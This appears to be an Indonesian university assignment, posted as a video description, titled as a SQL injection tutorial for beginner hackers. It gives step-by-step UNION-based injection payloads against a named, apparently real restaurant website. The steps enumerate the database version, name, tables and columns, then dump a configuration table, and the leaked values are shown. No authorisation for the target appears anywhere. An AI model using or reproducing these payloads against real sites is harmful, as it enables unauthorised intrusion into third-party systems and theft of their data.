Tutorial SQL Injection untuk Hacker Pemula

Описание: Dibuat untuk Tugas Mata Kuliah Keamanan Sistem dan Aplikasi
Nama : Laylatul Desia Rohmawati
NIM : 1902050640
Prodi : Sistem Informasi
Fakultas Teknologi Informasi
Unwaha Jombang


SQL Injection ialah suatu teknik penyerangan web dengan menggunakan kode SQL (Structured Query Language) yang berbahaya untuk memanipulasi database. Dikenal dengan istilah SQLi.


Dalam contoh ini, nama situs yang digunakan adalah :
https://www.empanadaguy.com/press-and...

Sintak yang digunakan dan tahapan SQL Injection-nya antara lain sebagai berikut :
1. Pilih website yang akan dimasuki SQL Injection :
https://www.empanadaguy.com/press-and...

2. Lakukan tes Vulnerabilitas dahulu untuk mengetahui apakah website tersebut bisa di-hack :
https://www.empanadaguy.com/press-and...
Beri tanda peti satu (‘) di akhir angka pada link

3. Cek jumlah kolom dalam website
https://www.empanadaguy.com/press-and... order by 1 –
order by 2 --
dst hingga muncul error.
Order by yang terakhir sebelum muncul error adalah jumlah kolom yang digunakan dalam website tersebut.
Untuk punya Ayla ketemu di order 8

4. Cari kolom yang vulnerable untuk mengetahui kolom ke berapa yang dapat dimasuki SQL Injection
https://www.empanadaguy.com/press-and... UNION SELECT 1,2,3,4,5,6,7,8 --
Dan ketemu untuk punya Ayla di kolom ke-3

5. Menentukan versi SQL untuk mempermudah pekerjaan dalam melakukan SQL Injection.
https://www.empanadaguy.com/press-and... UNION SELECT 1,2,@@version,4,5,6,7,8 --

Angka 3 diganti @@version mengingat kolom ke-3 adalah kolom velnerable
Ketemu : 10.1.41-MariaDB-0+deb10u2

6. Menentukan nama database untuk mengetahui nama database yang ada, sehingga kita dapat menentukan dengan mudah di database mana terdapat tabel yang penting.
https://www.empanadaguy.com/press-and... UNION SELECT 1,2,concat(database()),4,5,6,7,8 FROM information_schema.schemata --

Ketemu nama databasenya : 2012965_empanada

7. Menemukan nama tabel untuk mengetahui informasi tabel mana yang terdapat kolom berisi informasi penting.
https://www.empanadaguy.com/press-and... UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name) from information_schema.tables where table_schema=database() --

Ketemu : tbl_calendar,tbl_config,tbl_featured,tbl_food_menu,tbl_food_menu_category,tbl_locations,tbl_locations_hours,tbl_locations_types,tbl_menu,tbl_pages,tbl_press,tbl_slider

8. Menampilkan tabel satu-satu
https://www.empanadaguy.com/press-and... UNION SELECT 1,2,table_name,4,5,6,7,8 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1 --

Didapat pada limit 0,1 tabelnya adalah tbl_calender

9. Mencari nama kolom yang dicari
https://www.empanadaguy.com/press-and... UNION SELECT 1,2, group_concat(column_name),4,5,6,7,8 FROM information_schema.columns WHERE table_name="tbl_config" --

Ketemu kolom : config_id,config_value,config_notes
Ayla gunakan config_note

10. Mencari isi data
https://www.empanadaguy.com/press-and... UNION SELECT 1,2,group_concat(config_id, 0x3a ,config_value, 0x3a,config_notes) ,4,5,6,7,8 FROM 2012965_empanada.tbl_config --

maka didapat urutan config_id,config_value,config_notes sebagai berikut

Empanada Guy In The News
cdn_path:https://cdn.empanadaguy.com/:,
delivery_link:https://orders.thedeliveryguynj.com/s... = Hide Socials,link_facebook:  / facebook-preview-image.png:,site_name:empa...   Guy:,site_shortcut_icon:images/main-icon-v2.png:,site_url:https://www.empanadaguy.com:


~sekian, terima kasih sudah menyaksikan.


Produced by : Akomodear Project Studio


#sqlinjection
#hacking
#hacker
#querylanguage
#webserver
#vulanerable
#vulnerabilitas
#vulnerability
#orderby
#duniaIT
#dicoding
#aws